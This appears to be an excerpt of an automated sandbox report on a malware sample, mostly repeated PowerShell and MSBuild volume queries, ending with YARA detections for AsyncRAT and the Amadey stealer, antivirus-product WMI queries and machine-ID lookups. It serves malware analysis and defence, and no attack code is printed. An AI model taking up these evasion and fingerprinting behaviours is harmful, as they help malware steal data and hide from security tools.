Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe

Code function: 4_2_005ACBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

4_2_005ACBEA

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3322775695.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4724, type: MEMORYSTR

Source: SQ1NgqeTQy.exe, 00000000.00000003.2123776546.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2133103490.0000000000F8C000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2196717299.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 5.2.skotes.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.78K21CNZITPIMAK88B8Q.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.skotes.exe.c20000.0.unpack, type: UNPACKEDPE
